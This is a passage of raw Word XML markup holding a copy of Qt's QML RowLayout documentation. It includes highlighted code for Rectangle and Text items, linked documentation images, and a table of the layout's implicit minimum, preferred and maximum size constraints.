          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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maximumWidth</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>300</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minimumHeight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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>150</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Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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anchors</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centerIn</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parent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text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parent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width </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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'x'</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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parent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height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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'plum'</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fillWidth</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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minimumWidth</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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preferredWidth</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200</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preferredHeight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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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anchors</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centerIn</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parent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text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parent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width </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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'x'</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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parent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height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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w: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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/rowlayout-minimum.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B73CF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B73CF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/rowlayout-minimum.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B73CF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/rowlayout-minimum.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/rowlayout-minimum.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/rowlayout-minimum.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002E1325">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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png"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"http://doc.qt.io/qt-5/images/rowlayout-minimum.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1038" type="#_x0000_t75" alt="&quot;RowLayout at its minimum&quot;" style="width:115.2pt;height:115.2pt">
            <v:imagedata r:id="rId1702" r:href="rId1703"/>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002E1325">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B55535">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00610870">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B73CF4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Combining each item's constraints will give these </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>implicit constraints to the layout element</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9802"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869"/>
        <w:gridCol w:w="1562"/>
        <w:gridCol w:w="1552"/>
        <w:gridCol w:w="3819"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidTr="00C570D9">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1562"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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>minimum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1552"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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>preferred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798"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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>maximum</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidTr="00C570D9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289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570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>implicit constraints (width)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1562"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570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>156</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1552"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570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798"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570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>∞ (</w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Number.POSITIVE_INFINITY</w:t>
            </w:r>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidTr="00C570D9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>implicit constraints (heights)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1562"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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>150</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1552"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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>150</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3798"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C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C570D9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>150</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thus, the layout cannot be narrower than 156 or be taller or shorter than 150 without breaking any of the constraints of its child items.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1398" w:name="specifying-preferred-size"/>
      <w:bookmarkStart w:id="1399" w:name="_Toc483000830"/>
      <w:bookmarkStart w:id="1400" w:name="_Toc483003823"/>
      <w:bookmarkStart w:id="1401" w:name="_Toc483604176"/>
      <w:bookmarkStart w:id="1402" w:name="_Toc483605396"/>
      <w:bookmarkEnd w:id="1398"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
